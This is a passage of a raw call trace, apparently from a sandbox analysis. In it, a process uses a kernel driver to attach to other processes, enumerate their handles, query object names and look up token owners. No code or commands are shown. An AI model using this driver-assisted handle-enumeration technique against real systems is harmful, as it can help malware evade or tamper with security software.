ObfDereferenceObject (Object=0xffffe0006a374490) returned 0x8000 [0291.849] IoCompleteRequest () returned 0x0 [0291.849] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf04) returned 0x188 [0291.849] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.849] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068a48080, HandleInformation=0x0) returned 0x0 [0291.849] ObOpenObjectByPointer (in: Object=0xffffe00068a48080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.849] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x27fe2 [0291.849] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.849] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.849] IoCompleteRequest () returned 0x0 [0291.849] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.849] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.849] CloseHandle (hObject=0x18c) returned 1 [0291.850] CloseHandle (hObject=0x188) returned 1 [0291.850] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.850] PsAcquireProcessExitSynchronization () returned 0x0 [0291.850] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.850] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069d8ff20, HandleInformation=0x0) returned 0x0 [0291.850] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.850] PsReleaseProcessExitSynchronization () returned 0x2 [0291.850] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffe0 [0291.850] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.850] ObfDereferenceObject (Object=0xffffe00069d8ff20) returned 0x7fff [0291.850] IoCompleteRequest () returned 0x0 [0291.850] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.850] PsAcquireProcessExitSynchronization () returned 0x0 [0291.850] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.850] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069f4d8b0, HandleInformation=0x0) returned 0x0 [0291.850] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.850] PsReleaseProcessExitSynchronization () returned 0x2 [0291.850] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffdf [0291.850] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.850] ObfDereferenceObject (Object=0xffffe00069f4d8b0) returned 0x7fff [0291.850] IoCompleteRequest () returned 0x0 [0291.850] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.850] PsAcquireProcessExitSynchronization () returned 0x0 [0291.850] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.850] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a7a5a0, HandleInformation=0x0) returned 0x0 [0291.850] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.850] PsReleaseProcessExitSynchronization () returned 0x2 [0291.850] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffde [0291.850] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.850] ObfDereferenceObject (Object=0xffffe00068a7a5a0) returned 0x7f64 [0291.850] IoCompleteRequest () returned 0x0 [0291.850] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.850] PsAcquireProcessExitSynchronization () returned 0x0 [0291.850] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.850] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691aef20, HandleInformation=0x0) returned 0x0 [0291.850] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.850] PsReleaseProcessExitSynchronization () returned 0x2 [0291.850] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffdd [0291.850] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.850] ObfDereferenceObject (Object=0xffffe000691aef20) returned 0x1fffc [0291.850] IoCompleteRequest () returned 0x0 [0291.850] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.850] PsAcquireProcessExitSynchronization () returned 0x0 [0291.850] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.850] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6c2f20, HandleInformation=0x0) returned 0x0 [0291.851] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.851] PsReleaseProcessExitSynchronization () returned 0x2 [0291.851] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffdc [0291.851] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a3277c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3277c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.851] ObfDereferenceObject (Object=0xffffe0006a6c2f20) returned 0x1fff4 [0291.851] IoCompleteRequest () returned 0x0 [0291.851] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.851] PsAcquireProcessExitSynchronization () returned 0x0 [0291.851] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.851] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0291.851] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.851] PsReleaseProcessExitSynchronization () returned 0x2 [0291.851] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffdb [0291.851] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.851] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x27f92 [0291.851] IoCompleteRequest () returned 0x0 [0291.851] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.851] PsAcquireProcessExitSynchronization () returned 0x0 [0291.851] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.851] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0291.851] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.851] PsReleaseProcessExitSynchronization () returned 0x2 [0291.851] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffda [0291.851] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a714044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a714044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.851] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x27f91 [0291.851] IoCompleteRequest () returned 0x0 [0291.851] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.851] PsAcquireProcessExitSynchronization () returned 0x0 [0291.851] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.851] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4c3c00, HandleInformation=0x0) returned 0x0 [0291.851] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.851] PsReleaseProcessExitSynchronization () returned 0x2 [0291.851] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffd9 [0291.851] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.851] ObfDereferenceObject (Object=0xffffe0006a4c3c00) returned 0x7fff [0291.851] IoCompleteRequest () returned 0x0 [0291.851] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.851] PsAcquireProcessExitSynchronization () returned 0x0 [0291.851] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.851] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bdf20, HandleInformation=0x0) returned 0x0 [0291.851] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.851] PsReleaseProcessExitSynchronization () returned 0x2 [0291.851] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffd8 [0291.851] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.851] ObfDereferenceObject (Object=0xffffe000693bdf20) returned 0x7ffe [0291.852] IoCompleteRequest () returned 0x0 [0291.852] PsLookupProcessByProcessId (in: ProcessId=0xf04, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.852] PsAcquireProcessExitSynchronization () returned 0x0 [0291.852] KeStackAttachProcess (in: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a48080, ApcState=0xffffd000ac0cf400) [0291.852] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bc3a0, HandleInformation=0x0) returned 0x0 [0291.852] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.852] PsReleaseProcessExitSynchronization () returned 0x2 [0291.852] ObfDereferenceObject (Object=0xffffe00068a48080) returned 0x1ffd7 [0291.852] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.852] ObfDereferenceObject (Object=0xffffe000693bc3a0) returned 0x7fff [0291.852] IoCompleteRequest () returned 0x0 [0291.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x67c) returned 0x188 [0291.852] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.852] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe00068a57080, HandleInformation=0x0) returned 0x0 [0291.852] ObOpenObjectByPointer (in: Object=0xffffe00068a57080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.852] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x28022 [0291.852] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.852] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.852] IoCompleteRequest () returned 0x0 [0291.852] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.852] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.853] CloseHandle (hObject=0x18c) returned 1 [0291.853] CloseHandle (hObject=0x188) returned 1 [0291.853] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.853] PsAcquireProcessExitSynchronization () returned 0x0 [0291.853] KeStackAttachProcess (in: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400) [0291.853] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3c8f20, HandleInformation=0x0) returned 0x0 [0291.853] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.853] PsReleaseProcessExitSynchronization () returned 0x2 [0291.853] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x20020 [0291.853] ObQueryNameString (in: Object=0xffffe0006a3c8f20, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.853] ObfDereferenceObject (Object=0xffffe0006a3c8f20) returned 0x7eea [0291.853] IoCompleteRequest () returned 0x0 [0291.853] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.853] PsAcquireProcessExitSynchronization () returned 0x0 [0291.853] KeStackAttachProcess (in: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400) [0291.853] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a4f3500, HandleInformation=0x0) returned 0x0 [0291.853] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.853] PsReleaseProcessExitSynchronization () returned 0x2 [0291.853] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x2001f [0291.853] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.853] ObfDereferenceObject (Object=0xffffe0006a4f3500) returned 0x7fff [0291.853] IoCompleteRequest () returned 0x0 [0291.853] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.853] PsAcquireProcessExitSynchronization () returned 0x0 [0291.853] KeStackAttachProcess (in: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400) [0291.853] ObReferenceObjectByHandle (in: Handle=0x1a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a84a10, HandleInformation=0x0) returned 0x0 [0291.853] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.853] PsReleaseProcessExitSynchronization () returned 0x2 [0291.854] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x2001e [0291.854] ObQueryNameString (in: Object=0xffffe00068a84a10, ObjectNameInfo=0xffffe00069ba5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069ba5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.854] ObfDereferenceObject (Object=0xffffe00068a84a10) returned 0x7fff [0291.854] IoCompleteRequest () returned 0x0 [0291.854] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.854] PsAcquireProcessExitSynchronization () returned 0x0 [0291.854] KeStackAttachProcess (in: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400) [0291.854] ObReferenceObjectByHandle (in: Handle=0x1a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a954c20, HandleInformation=0x0) returned 0x0 [0291.854] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.854] PsReleaseProcessExitSynchronization () returned 0x2 [0291.854] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x2001d [0291.854] ObQueryNameString (in: Object=0xffffe0006a954c20, ObjectNameInfo=0xffffe00068a61044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068a61044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0291.854] ObfDereferenceObject (Object=0xffffe0006a954c20) returned 0x7fff [0291.854] IoCompleteRequest () returned 0x0 [0291.854] PsLookupProcessByProcessId (in: ProcessId=0x67c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.854] PsAcquireProcessExitSynchronization () returned 0x0 [0291.854] KeStackAttachProcess (in: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00068a57080, ApcState=0xffffd000ac0cf400) [0291.854] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069346090, HandleInformation=0x0) returned 0x0 [0291.854] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.854] PsReleaseProcessExitSynchronization () returned 0x2 [0291.854] ObfDereferenceObject (Object=0xffffe00068a57080) returned 0x2001c [0291.854] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068524044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068524044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.854] ObfDereferenceObject (Object=0xffffe00069346090) returned 0x8000 [0291.854] IoCompleteRequest () returned 0x0 [0291.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x974) returned 0x188 [0291.854] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0291.854] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a0d3080, HandleInformation=0x0) returned 0x0 [0291.854] ObOpenObjectByPointer (in: Object=0xffffe0006a0d3080, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000a5c) returned 0x0 [0291.854] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x27fe6 [0291.854] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000a5c, DesiredAccess=0x8, TokenHandle=0xffffe0006a8c7380 | out: TokenHandle=0xffffe0006a8c7380*=0x18c) returned 0x0 [0291.854] ZwClose (Handle=0xffffffff80000a5c) returned 0x0 [0291.854] IoCompleteRequest () returned 0x0 [0291.854] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0291.854] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0291.856] CloseHandle (hObject=0x18c) returned 1 [0291.856] CloseHandle (hObject=0x188) returned 1 [0291.856] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.856] PsAcquireProcessExitSynchronization () returned 0x0 [0291.856] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.856] ObReferenceObjectByHandle (in: Handle=0x14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691ec090, HandleInformation=0x0) returned 0x0 [0291.856] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.856] PsReleaseProcessExitSynchronization () returned 0x2 [0291.856] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffe4 [0291.856] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.856] ObfDereferenceObject (Object=0xffffe000691ec090) returned 0x7fff [0291.856] IoCompleteRequest () returned 0x0 [0291.856] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.856] PsAcquireProcessExitSynchronization () returned 0x0 [0291.856] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.856] ObReferenceObjectByHandle (in: Handle=0x28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068540f20, HandleInformation=0x0) returned 0x0 [0291.856] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0291.856] PsReleaseProcessExitSynchronization () returned 0x2 [0291.856] ObfDereferenceObject (Object=0xffffe0006a0d3080) returned 0x1ffe3 [0291.856] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0291.856] ObfDereferenceObject (Object=0xffffe00068540f20) returned 0x7fff [0291.856] IoCompleteRequest () returned 0x0 [0291.856] PsLookupProcessByProcessId (in: ProcessId=0x974, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0291.856] PsAcquireProcessExitSynchronization () returned 0x0 [0291.856] KeStackAttachProcess (in: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a0d3080, ApcState=0xffffd000ac0cf400) [0291.856] ObReferenceObjectByHandle (in: Handle=0x2c, 